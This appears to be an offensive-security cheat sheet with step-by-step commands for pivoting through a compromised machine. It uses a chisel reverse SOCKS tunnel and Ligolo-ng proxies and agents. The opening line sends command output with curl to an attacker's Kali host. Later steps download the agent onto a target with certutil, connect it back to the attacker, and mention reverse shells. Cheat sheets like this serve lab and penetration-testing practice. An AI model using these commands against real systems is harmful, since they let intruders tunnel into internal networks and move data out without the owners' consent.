/tmp/chisel client <Kail IP Address>:<Kali Port> R:socks &> /tmp/output; curl --data @/tmp/output http://<Kali IP Address>:<Kali Port>/
Ligolo-Ng
NOTE: When using nmap, add --unprivileged OR -PE to avoid false positives
Setup
On Kali
1
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <Internal net>/24 dev ligolo
2
mkdir ligolo && cd ligolo
3
mkdir proxy && cd proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
cd ..
4
mkdir ../agents && cd ../agents
mkdir windows && cd windows
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
cd ..
5
mkdir linux && cd linux
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
cd ..
6
python3 -m http.server 80
On Target Machine
certutil -urlcache -split -f http://<Kali IP Address>/<windows / linux>/agent.exe
Tunnel
On Kali
./proxy -selfcert
NOTE: Run the above command in /ligolo/proxy
On Target Machine
agent.exe -connect <Kali IP Address>:<Kali Listening port> -ignore-cert
NOTE: Once agent connects to server, return to Kali Machine and follow the steps in ligolo-ng console
session
<SELECT WHICH SESSION>
start
NOTE: Add the following if you want the internal to reach you. E.G. reverse shell